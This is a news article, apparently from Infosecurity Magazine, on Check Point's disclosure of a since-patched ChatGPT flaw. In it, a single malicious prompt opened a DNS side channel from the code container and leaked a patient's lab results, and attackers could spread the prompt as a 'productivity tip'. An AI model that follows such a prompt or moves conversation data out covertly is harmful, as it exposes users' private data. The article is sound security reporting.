ChatGPT Security Issue Enabled Data Theft via Single Prompt

Written by

A security vulnerability in ChatGPT executed with a single malicious prompt could be exploited to covertly exfiltrate sensitive data from prompts and messages.

The security issue, which enabled data exfiltration and remote code execution, was discovered by cybersecurity researchers at Check Point, who warned it could put user privacy at risk.

“A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content,” Check Point said in a blog post published on March 30.

A security update for ChatGPT was deployed on February 20 after researchers reported the issue to OpenAI.

Prior to the fix, a hidden outbound communication path from ChatGPT’s isolated execution runtime to the public internet could have put users at risk of having their messages and prompts exposed.

Many people have become accustomed ChatGPT and other AI assistants to help more efficiently manage tasks at work. This includes those which involve sensitive corporate data, including account details and private records.

LLMs are also being used to discuss personal issues, like their health, personal finances or mental wellbeing.

Users expect this information to remain within the system, protected from exfiltration by appropriate guardrails. However, Check Point found that it was possible to bypass these protections.

“We found that a single malicious prompt could activate a hidden exfiltration channel inside a regular ChatGPT conversation,” said researchers.

The vulnerability allowed for information to be transmitted to an external server through a DNS side channel originating from the container used by ChatGPT.

Key to the issue was how the model operated under the assumption that this environment was not designed to send data outward, so when the model was promoted to send data, it did not know how to mediate or resist this.  

An attacker could take advantage of this by using the prompt and directing ChatGPT to send information exchanged with the model outside the framework to access it themselves.

Third-Party Access to Private Prompts

In a proof-of-concept Check Point uploaded a PDF containing laboratory test results, which also contained personal information, including a patient name and used the malicious prompt to exploit the vulnerability.

When asked if the information was sent to a third-party, ChatGPT responded that it had not, seemingly unaware that because of its actions a server operated by the attacker received highly sensitive data extracted from the conversation.

The vulnerability was based around the user entering the prompt themselves. The researchers pointed out that there are multiple ways to trick users into entering commands, for example, by listing the malicious prompt on a website or social media thread about the top prompts for productivity and other terms people may search for.

“For many users, copying and pasting such prompts into a new conversation is routine and does not appear risky,” said researchers.

“A malicious prompt distributed in that format could therefore be presented as a harmless productivity aid and interpreted as just another useful trick for getting better results from the assistant.”

While it’s unknown if this vulnerability was exploited in the wild, Check Point researchers warned that as AI assistants like ChatGPT are increasingly operating in environments which may as involve sensitive data, security must be a priority.

“As AI tools become more powerful and widely used, security must remain a central consideration. These systems offer enormous benefits, but adopting them safely requires careful attention to every layer of the platform,” the blog post concluded.

Infosecurity has contacted OpenAI for comment.

Image credit: Anton Dzhumelia / Shutterstock.com

What’s Hot on Infosecurity Magazine?